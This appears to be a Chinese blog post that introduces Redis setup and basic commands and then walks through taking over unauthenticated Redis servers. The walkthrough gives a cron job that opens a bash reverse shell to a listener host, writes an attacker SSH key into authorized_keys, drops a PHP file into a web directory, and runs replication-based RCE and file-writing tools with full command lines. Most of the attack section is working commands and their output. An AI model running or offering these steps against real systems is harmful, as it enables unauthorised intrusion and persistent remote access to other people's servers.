Redis

Redis本身是键值对数据库，但是值对应多种数据结构

安装配置redis

wget http://download.redis.io/releases/redis-4.0.8.tar.gz
下载之后，解压安装即可。

修改redis.conf

（1）cp redis.conf ./src/redis.conf
（2）bind 127.0.0.1前面加上#号注释掉
（3）protected-mode设为no
（4）启动redis-server
./src/redis-server redis.conf

默认的配置是使用6379端口，没有密码。这时候会导致未授权访问然后使用redis权限写文件。

连接redis服务器

（1）交互式方式

redis-cli -h {host} -p {port}
redis-cli -h -127.0.0.1 -p 6379

然后所有的操作都是在交互的方式实现，不需要再执行redis-cli了,加-a参数就是带密码的访问了。

（2）命令方式

redis-cli -h {host} -p {port} {command}
redis-cli -h 127.0.0.1 -p 6379 info

直接得到命令的返回结果.

常用的命令

（1）查看信息：info
（2）删除所有数据库内容：flushall
（3）刷新数据库：flushdb
（4）看所有键：KEYS *，使用select num可以查看键值数据。
（5）设置变量：set test “who am i”
（6）config set dir dirpath 设置路径等配置
（7）config get dir/dbfilename 获取路径及数据配置信息
（8）save保存
（9）get 变量，查看变量名称

Redis的一些简单常用命令

• SET KEY VALUE

  设置指定 key 的值

• GET key

  获取指定 key 的值。

• STRLEN key

  返回 key 所储存的字符串值的长度

• INCR key

  将 key 中储存的数字值增一

• DECR key

  将 key 中储存的数字值减一

• MSET key1 value1 key2 value2 .. keyN valueN

  同时设置一个或多个 key-value 对

• MSETNX key1 value1 key2 value2 .. keyN valueN

  当所有 key 都成功设置，返回 1 。 如果所有给定 key 都设置失败(至少有一个 key 已经存在)，那么返回 0。

• flushall

  删除所有数据

• del key

  删除键为key的数据

hash表

Redis本身是键值对数据库，但是值对应多种数据结构，hash（即键值对），值中的键值对称为field和value。和string的使用方式其实差不多，就是在对应的命令前面加上h。

列表

Redis列表是简单的字符串列表，按照插入顺序排序。你可以添加一个元素到列表的头部（左边）或者尾部（右边）

集合

Redis 的 Set 是 String 类型的无序集合。集合成员是唯一的，这就意味着集合中不能出现重复的数据。

有序集合

Redis 有序集合和集合一样也是string类型元素的集合,且不允许重复的成员。

不同的是每个元素都会关联一个double类型的分数。redis正是通过分数来为集合中的成员进行从小到大的排序。

有序集合的成员是唯一的,但分数(score)却可以重复。

Redis getshell

如果在安装redis之后，没有修改redis.conf中的bind 127.0.0.1，就会导致redis暴露在公网中，此时如果没有设置连接密码，就会造成redis的未授权访问。

写入定时任务

在Ubuntu中，将命令使用redis写入会导致乱码问题，从而使得定时任务无法被反弹回去，所以在Ubuntu中是无法使用写定时任务去反弹shell的。如果是CentOS，可以使用此方法。

• Centos的定时任务文件在/var/spool/cron/root

• Ubuntu定时任务文件在/var/spool/cron/crontabs/root

以CentOS为例

set x "\n* * * * * bash -i >& /dev/tcp/10.10.10.131/4444 0>&1\n"

config set dir /var/spool/cron/

config set dbfilename root
 
save

写入ssh公钥

10.10.10.130:6379> config set dir /home/tunan/.ssh
OK
10.10.10.130:6379> config set dbfilename authorized_keys
OK
10.10.10.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnpxFIMGfQZnhyPyEZ7x/5ZUzxDp3XQYU5hszzDmDcCTwmcY2WNvxkulgutO3GCZht9bnhPyaRyp+BW2EeE7q3IUqanqF04UZdZW1V7YRQ1vTmxtr3lDIj2eoqTd7X4cyIS6KvVnm6wR8DoYbqYF8l7eZWolfrsvK1mYutrkAytlTT6wU2zT6eAJWXUA/XrW3iNquW2QJiPSPy3IHo77IFMssSOkuId0QiGdxiAHe36qZVGn069hLH0/KdNW3M0Q++FgKnHrQAIudreJFXDhxabyVUb+9IO4ObQa/aGuoNsDCC1f02LUJxsd6ym+ASEifMlNR5Lq2zWqkU/8AShJKR tunan@ubuntu \n\n\n"
OK
10.10.10.130:6379> save
OK


tunan@ubuntu:/$ ssh -i id_rsa tunan@10.10.10.130
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)

写入web目录

如果redis的启动权限比较低，但是我们知道他网站的路径的话，可以写一句话木马去，然后进行连接。

10.10.10.130:6379> set x "<?php phpinfo();?>"
OK
10.10.10.130:6379> config set dir /home/tunan/桌面
OK
10.10.10.130:6379> config set dbfilename shell.php
OK
10.10.10.130:6379> save
OK

可以看到我在写的文件位置处看到了写的phpinfo()。然后可以运行。

其实这些方法，无论是写web目录，还是ssh，主要都是可以控制文件的输出位置，其实原理都差不多，只不过是在不同的位置，写入相应能获得shell的东西。没什么本质区别。而这些东西都有一个特性，就是容错率很高，即使我们输出的文件有些许”垃圾”信息，他们依旧可以执行成功。

主从复制rce

关于主从复制，在Reids 4.x之后，Redis新增了模块功能，通过外部拓展，可以实现在redis中实现一个新的Redis命令，通过写c语言并编译出.so文件。

在两个Redis实例设置主从模式的时候，Redis的主机实例可以通过FULLRESYNC同步文件到从机上。

然后在从机上加载so文件，我们就可以执行拓展的新命令了。

至于如何实现主从复制模式，可以百度获取。我们开启两个redis之后，先测试一下。发现两边的信息可以共享，说明主从复制正常开启。

https://github.com/Ridter/redis-rce
https://github.com/n0b0dyCN/redis-rogue-server

把上面这两个文件获取下来，再将.os文件copy到第一个redis-rce-master文件中，执行下面的命令即可

python3 redis-rce.py --rhost 10.10.10.130(目标机IP) --rport 6379(目标机端口) --lhost 10.10.10.129(本机IP) --lport 4444(本机端口) -f modile.so

拿到shell。

写干净的数据

RedisWriteFile。其原理是利用Redis的主从同步写数据，脚本将自己模拟为master，设置对端为slave，这里master的数据空间是可以保证绝对干净的，因此就轻松实现了写无损文件了。

https://github.com/r35tart/RedisWriteFile


python RedisWriteFile.py --rhost=[target_ip] --rport=[target_redis_port] --lhost=[evil_master_host] --lport=[random] --rpath="[path_to_write]" --rfile="[filename]" --lfile=[filename]

成功。

赏

谢谢你请我吃糖果